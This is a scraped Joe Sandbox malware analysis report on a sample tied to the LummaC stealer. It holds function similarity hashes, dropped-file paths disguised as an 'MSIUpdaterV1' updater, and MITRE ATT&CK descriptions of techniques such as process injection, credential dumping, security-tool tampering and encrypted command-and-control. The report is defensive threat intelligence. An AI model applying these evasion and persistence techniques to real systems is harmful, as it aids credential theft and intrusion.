Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: L1V
API String ID: 4194217158-3264503493
Opcode ID: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction ID: e1b9b6c1360d17ba0559ae48e61f4ee1fdb0b5d35d3742f4ad828708de05f8a7
Opcode Fuzzy Hash: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction Fuzzy Hash: DF51DFB1C05248EBDB00DFA8D9457DEFBF4FB29704F204269E814A7391E7B55A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017BF5B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 0017C066

Strings

MOC, xrefs: 0017BF92
RCC, xrefs: 0017BF9A

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction ID: a5e87b7b4724dc0688aad338629becfe9fcbd5db41cdd9c93e6a8bc51ff7efbe
Opcode Fuzzy Hash: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction Fuzzy Hash: 3E414775900209EFCF16DFA8CD81AEEBBB5FF48304F158159F908A7261D3359A90DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0017BF5B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 0017C066

Strings

RCC, xrefs: 0017BF9A
MOC, xrefs: 0017BF92

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction ID: a5e87b7b4724dc0688aad338629becfe9fcbd5db41cdd9c93e6a8bc51ff7efbe
Opcode Fuzzy Hash: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction Fuzzy Hash: 3E414775900209EFCF16DFA8CD81AEEBBB5FF48304F158159F908A7261D3359A90DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001118F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001118F5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0011193A

Part of subcall function 0011934E: _Yarn.LIBCPMT ref: 0011936D
Part of subcall function 0011934E: _Yarn.LIBCPMT ref: 00119391

Strings

bad locale name, xrefs: 00111948

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: cb045b3b83470305e9f0fcf6b7b740e5d84c55bddd145928ea6777085c613f3e
Instruction ID: f2badd76f726c1c4d8a073f3ecba56b24116fbfb7f2d836ef65fa6a1544a6181
Opcode Fuzzy Hash: cb045b3b83470305e9f0fcf6b7b740e5d84c55bddd145928ea6777085c613f3e
Instruction Fuzzy Hash: DEF01D60505B808ED374DF758414783FEE0AF25314F048A2DD4DAC7B81E375E548CBA6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OJa1BOigU3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\MPGPH1\MPGPH1.exe

C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe

C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe

C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSIUpdaterV1.exe_f9eb3d1e2eda166485f639133f6bde09db46edb_bdfd7a68_899606cd-84e4-4b77-a8a7-4c234ca106ec\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSIUpdaterV1.exe_f9eb3d1e2eda166485f639133f6bde09db46edb_bdfd7a68_a5e699bc-c9f4-45d5-a862-f27dedd08d42\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_v6ggwc2fJXXgIu5f_1887f2cf649886fae0c2ea234d3f8ef03762663d_678a9ce0_5061925a-09f5-43b8-b876-e8a14283e34c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9FF.tmp.dmp

Windows Analysis Report
OJa1BOigU3.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre